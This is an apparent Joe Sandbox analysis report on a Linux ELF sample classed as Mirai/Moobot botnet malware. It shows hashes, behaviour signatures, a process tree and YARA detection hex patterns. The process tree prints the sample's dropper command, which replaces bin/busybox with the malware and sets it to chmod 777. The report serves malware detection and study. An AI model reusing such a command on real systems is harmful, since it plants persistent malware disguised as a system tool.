Edit tour

Linux Analysis Report
cN7jzEkjeq.elf

Overview

General Information

Sample name:	cN7jzEkjeq.elf renamed because original name is a hash value
Original sample name:	39ef44ca87bbf9e1a01b12fd2ae3237b.elf
Analysis ID:	1447656
MD5:	39ef44ca87bbf9e1a01b12fd2ae3237b
SHA1:	fadf4315ebeba07ba55bb1996eff32fb092f5532
SHA256:	b059459fcc36d07e0747d85abf2488c558ca728dc4099b831064cfe4541d6704
Tags:	32elfgafgytrenesas
Infos:

Detection

Mirai, Moobot

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Moobot

Contains symbols with names commonly found in malware

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample and/or dropped files contains symbols with suspicious names

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings that are potentially command strings

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447656
Start date and time:	2024-05-26 11:00:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	cN7jzEkjeq.elf renamed because original name is a hash value
Original Sample Name:	39ef44ca87bbf9e1a01b12fd2ae3237b.elf
Detection:	MAL
Classification:	mal92.troj.linELF@0/0@0/0

Warnings

Skipping network analysis since amount of network traffic is too extensive

Runtime Messages

Command:	/tmp/cN7jzEkjeq.elf
PID:	5438
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	done.
Standard Error:	chmod: cannot access ''$'\377\177\360\373\377\177''bin/busybox'$'\177\310\373\377\177\350\373\377\177\034\374\377\177\270\260''A': No such file or directory

Process Tree

system is lnxubuntu20

cN7jzEkjeq.elf (PID: 5438, Parent: 5359, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/cN7jzEkjeq.elf

cN7jzEkjeq.elf New Fork (PID: 5440, Parent: 5438)

sh (PID: 5440, Parent: 5438, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/cN7jzEkjeq.elf bin/busybox; chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A"

sh New Fork (PID: 5442, Parent: 5440)

rm (PID: 5442, Parent: 5440, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox

sh New Fork (PID: 5443, Parent: 5440)

mkdir (PID: 5443, Parent: 5440, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin

sh New Fork (PID: 5444, Parent: 5440)

mv (PID: 5444, Parent: 5440, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/cN7jzEkjeq.elf bin/busybox

sh New Fork (PID: 5445, Parent: 5440)

chmod (PID: 5445, Parent: 5440, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A

cN7jzEkjeq.elf New Fork (PID: 5446, Parent: 5438)

cN7jzEkjeq.elf New Fork (PID: 5448, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5450, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5451, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5455, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5457, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5458, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5460, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5462, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5464, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5466, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5468, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5470, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5472, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5474, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5476, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5478, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5480, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5482, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5484, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5485, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5488, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5490, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5492, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5495, Parent: 5446)

cN7jzEkjeq.elf New Fork (PID: 5496, Parent: 5446)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
MooBot		No Attribution	https://blog.netlab.360.com/ddos-botnet-moobot-en/ https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b	https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
cN7jzEkjeq.elf	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
cN7jzEkjeq.elf	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
cN7jzEkjeq.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
cN7jzEkjeq.elf	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c10c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c120:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c15c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c24c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c29c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

Memory Dumps

Source	Rule	Description	Author	Strings
5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c10c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c120:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c15c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c24c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c29c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c10c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c120:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c15c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c24c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c29c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c10c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c120:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c15c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c1fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c24c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c29c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: cN7jzEkjeq.elf PID: 5438	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: cN7jzEkjeq.elf PID: 5438	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: cN7jzEkjeq.elf PID: 5438	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x6017:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x602b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x603f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6053:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6067:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x607b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x608f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x60a3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x60b7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x60cb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x60df:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x60f3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6107:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x611b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x612f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6143:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6157:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x616b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x617f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6193:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x61a7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: cN7jzEkjeq.elf PID: 5464	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: cN7jzEkjeq.elf PID: 5464	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: cN7jzEkjeq.elf PID: 5464	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x67dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x67f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x682c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x687c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x68a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x68b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x68cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x68e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x68f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6908:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x691c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6930:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6944:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6958:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x696c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: cN7jzEkjeq.elf PID: 5468	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: cN7jzEkjeq.elf PID: 5468	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
